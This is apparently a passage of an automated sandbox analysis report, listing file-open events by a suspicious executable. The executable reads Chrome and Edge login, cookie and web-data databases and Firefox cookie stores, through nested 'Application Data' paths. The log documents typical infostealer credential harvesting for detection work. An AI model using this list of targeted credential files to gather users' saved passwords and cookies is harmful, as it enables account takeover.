                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Local StateJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Microsoft\Edge\User Data\Default\Login Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Extension Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\Cookies-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login DataJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                                    Source: C:\providerBrowserruntimeCrt\BSlvAOjamepaXWJMhY.exeFile opened: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
